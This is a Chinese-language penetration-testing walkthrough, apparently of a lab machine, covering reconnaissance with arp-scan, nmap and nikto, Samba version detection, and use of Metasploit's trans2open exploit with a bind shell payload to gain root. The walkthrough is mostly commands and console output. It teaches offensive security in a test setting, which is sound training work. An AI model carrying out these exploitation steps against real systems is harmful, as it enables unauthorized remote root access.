contents
0x00 信息收集
arp-scan -l # -l 从接口配置生成地址。从接口地址和网络掩码生成列表(包括网络和广播)。
nmap -p- -sV 192.168.2.143 # -p- 搜索全端口 -sV 探测打开端口以确定服务/版本信息
没啥特别的发现
nikto -h 192.168.2.143 # -h 代表主机,后面跟IP或url
扫出了三个cve,但是都不太好利用,两个xss,一个信息泄露。
0x01 Samba
看到目标主机开了samba服务,可能会比较好入手。搞清楚samba服务的版本是多少才能在漏洞库中查寻已知的利用模块,msf里有一个模块可以探测目标的samba版本号,模块如下:
auxiliary/scanner/smb/smb_version #smb系统扫描模块
Msfconsole提供了一个一体化的集中控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集
进入msf
如果知道完整位置就可以直接使用
use auxiliary/scanner/smb/smb_version
不知道也可以搜索
search smb_version # 搜索smb版本识别板块
use 0 # 使用0
show options # 显示相关参数,或者使用显示更加详细的 show info
set rhosts 192.168.2.143 # 设置目标
exploit # 实施
得到samba版本为2.2.1a
searchsploit 搜索发现该版本存在 RCE 漏洞
“searchsploit”是一个用于Exploit-DB的命令行搜索工具
searchsploit samba 2.2.1a
search trans2open #搜一下刚刚查到的第一个,那些都能试试,方法不是唯一的
use 1 # 注意目标的系统,如果模块支持的系统不同,那将可能导致报错,这里我们使用第二个模块
show options # 查看相关参数
msf6 exploit(linux/samba/trans2open) > set rhosts 192.168.2.143 # 设置目标机器(此处只要求设置rhosts)
rhosts => 192.168.2.143
msf6 exploit(linux/samba/trans2open) > show payloads # 查看相关payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/debug_trap normal No Generic x86 Debug Trap
2 payload/generic/shell_bind_aws_ssm normal No Command Shell, Bind SSM (via AWS API)
3 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
4 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
5 payload/generic/ssh/interact normal No Interact with Established SSH Connection
6 payload/generic/tight_loop normal No Generic x86 Tight Loop
7 payload/linux/x86/adduser normal No Linux Add User
8 payload/linux/x86/chmod normal No Linux Chmod
9 payload/linux/x86/exec normal No Linux Execute Command
10 payload/linux/x86/meterpreter/bind_ipv6_tcp normal No Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
11 payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid normal No Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
12 payload/linux/x86/meterpreter/bind_nonx_tcp normal No Linux Mettle x86, Bind TCP Stager
13 payload/linux/x86/meterpreter/bind_tcp normal No Linux Mettle x86, Bind TCP Stager (Linux x86)
14 payload/linux/x86/meterpreter/bind_tcp_uuid normal No Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
15 payload/linux/x86/meterpreter/reverse_ipv6_tcp normal No Linux Mettle x86, Reverse TCP Stager (IPv6)
16 payload/linux/x86/meterpreter/reverse_nonx_tcp normal No Linux Mettle x86, Reverse TCP Stager
17 payload/linux/x86/meterpreter/reverse_tcp normal No Linux Mettle x86, Reverse TCP Stager
18 payload/linux/x86/meterpreter/reverse_tcp_uuid normal No Linux Mettle x86, Reverse TCP Stager
19 payload/linux/x86/metsvc_bind_tcp normal No Linux Meterpreter Service, Bind TCP
20 payload/linux/x86/metsvc_reverse_tcp normal No Linux Meterpreter Service, Reverse TCP Inline
21 payload/linux/x86/read_file normal No Linux Read File
22 payload/linux/x86/shell/bind_ipv6_tcp normal No Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
23 payload/linux/x86/shell/bind_ipv6_tcp_uuid normal No Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
24 payload/linux/x86/shell/bind_nonx_tcp normal No Linux Command Shell, Bind TCP Stager
25 payload/linux/x86/shell/bind_tcp normal No Linux Command Shell, Bind TCP Stager (Linux x86)
26 payload/linux/x86/shell/bind_tcp_uuid normal No Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
27 payload/linux/x86/shell/reverse_ipv6_tcp normal No Linux Command Shell, Reverse TCP Stager (IPv6)
28 payload/linux/x86/shell/reverse_nonx_tcp normal No Linux Command Shell, Reverse TCP Stager
29 payload/linux/x86/shell/reverse_tcp normal No Linux Command Shell, Reverse TCP Stager
30 payload/linux/x86/shell/reverse_tcp_uuid normal No Linux Command Shell, Reverse TCP Stager
31 payload/linux/x86/shell_bind_ipv6_tcp normal No Linux Command Shell, Bind TCP Inline (IPv6)
32 payload/linux/x86/shell_bind_tcp normal No Linux Command Shell, Bind TCP Inline
33 payload/linux/x86/shell_bind_tcp_random_port normal No Linux Command Shell, Bind TCP Random Port Inline
34 payload/linux/x86/shell_reverse_tcp normal No Linux Command Shell, Reverse TCP Inline
35 payload/linux/x86/shell_reverse_tcp_ipv6 normal No Linux Command Shell, Reverse TCP Inline (IPv6)
msf6 exploit(linux/samba/trans2open) > set payload 25 # 这里我们使用x86的bind,一般会使用bind或者reverse(如34)
payload => linux/x86/shell/bind_tcp
msf6 exploit(linux/samba/trans2open) > exploit # 开始攻击
[*] 192.168.2.143:139 - Trying return address 0xbffffdfc...
[*] Started bind TCP handler against 192.168.2.143:4444
[*] 192.168.2.143:139 - Trying return address 0xbffffcfc...
[*] 192.168.2.143:139 - Trying return address 0xbffffbfc...
[*] 192.168.2.143:139 - Trying return address 0xbffffafc...
[*] Sending stage (36 bytes) to 192.168.2.143
[*] 192.168.2.143:139 - Trying return address 0xbffff9fc...
[*] 192.168.2.143:139 - Trying return address 0xbffff8fc...
[*] 192.168.2.143:139 - Trying return address 0xbffff7fc...
[*] 192.168.2.143:139 - Trying return address 0xbffff6fc...
[*] 192.168.2.143:139 - Trying return address 0xbffff5fc...
[*] Command shell session 5 opened (192.168.2.128:33813 -> 192.168.2.143:4444) at 2023-12-14 12:17:21 +0800
id
uid=0(root) gid=0(root) groups=99(nobody) # 拿到root权限
补充
Stager这种Payload负责建立目标用户与攻击者之间的网络连接,并下载额外的组件或应用程序。一种常见的Stager Payload就是reverse_tcp,它可以让目标系统与攻击者建立一条tcp连接,让目标系统主动连接我们的端口(反向连接)。另一种常见的是bind_tcp,它可以让目标系统开启一个tcp监听器,而攻击者随时可以与目标系统进行通信(正向连接)。